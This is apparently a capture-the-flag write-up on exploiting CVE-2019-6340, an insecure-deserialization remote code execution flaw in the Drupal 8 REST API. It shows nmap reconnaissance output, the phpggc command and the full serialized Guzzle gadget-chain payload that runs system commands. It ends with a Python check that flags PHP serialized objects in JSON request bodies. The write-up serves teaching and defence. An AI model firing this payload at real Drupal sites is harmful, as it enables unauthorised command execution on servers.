Not so Blin D Rush CVE-2019-6340


In short, the remote code execution is caused by insecure deserialization performed by the Drupal 8 REST API.

Insecure Deserialization

To understand insecure deserialization, first understand what serialization and deserialization are.


Challenge Solution

By visiting the challenge URL we see a post made by the user optimusprime. However, a quick look at the favicon suggests the site is running on Drupal.

Blog Post by Optimus Prime
nmap -p 80 -T4 -A host
Starting Nmap 7.80 ( ) at DATE IST
Nmap scan report for host
Host is up (0.000058s latency).
Other addresses for localhost (not scanned): ::1
80/tcp open http Apache httpd 2.4.41 ((Unix))
|_http-generator: Drupal 8 (
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_http-server-header: Apache/2.4.41 (Unix)
|_http-title: Home | Cybertron
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 17.92 seconds
"link": [
"value": "link",
"_links": {
"type": {
"href": ""
phpggc guzzle/rce1 system id --json
O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}
When unserialize() is triggered on this payload, the embedded command is executed.
s:4:\"ls /\"
Contents of / directory
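As an added defensive example (not part of the original writeup), the following check flags PHP serialized-object headers hidden in string fields of a JSON REST request body, the kind of test a request filter or log reviewer could run. The request bodies, their key names and the harmless stdClass object are constructed samples shaped like the request on this page.

```python
import json
import re

# Header of a PHP serialized object: O:<name length>:"<class name>":<prop count>:{
PHP_OBJECT_RE = re.compile(r'O:(\d+):"([^"]*)":\d+:\{')


def iter_strings(node):
    """Yield every string value nested anywhere in a parsed JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from iter_strings(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_strings(item)


def find_php_objects(raw_body):
    """Return class names of PHP serialized objects found inside string fields of a
    JSON request body; an empty list means no object header was found."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return []
    found = []
    for text in iter_strings(body):
        for match in PHP_OBJECT_RE.finditer(text):
            declared_len, class_name = int(match.group(1)), match.group(2)
            # Only count headers whose declared length matches the class name,
            # which weeds out prose that merely resembles the O:n:"..." pattern.
            if declared_len == len(class_name.encode()):
                found.append(class_name)
    return found


# Constructed sample bodies shaped like the REST request on the page; the key
# names and the harmless stdClass object are illustrative, not a real payload.
BENIGN_BODY = json.dumps({
    "link": [{"value": "link"}],
    "_links": {"type": {"href": "https://example.invalid/rest/type/placeholder"}},
})
SUSPICIOUS_BODY = json.dumps({
    "link": [{"value": 'O:8:"stdClass":0:{}'}],
    "_links": {"type": {"href": "https://example.invalid/rest/type/placeholder"}},
})

if __name__ == "__main__":
    print("benign:", find_php_objects(BENIGN_BODY))          # []
    print("suspicious:", find_php_objects(SUSPICIOUS_BODY))  # ['stdClass']
```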


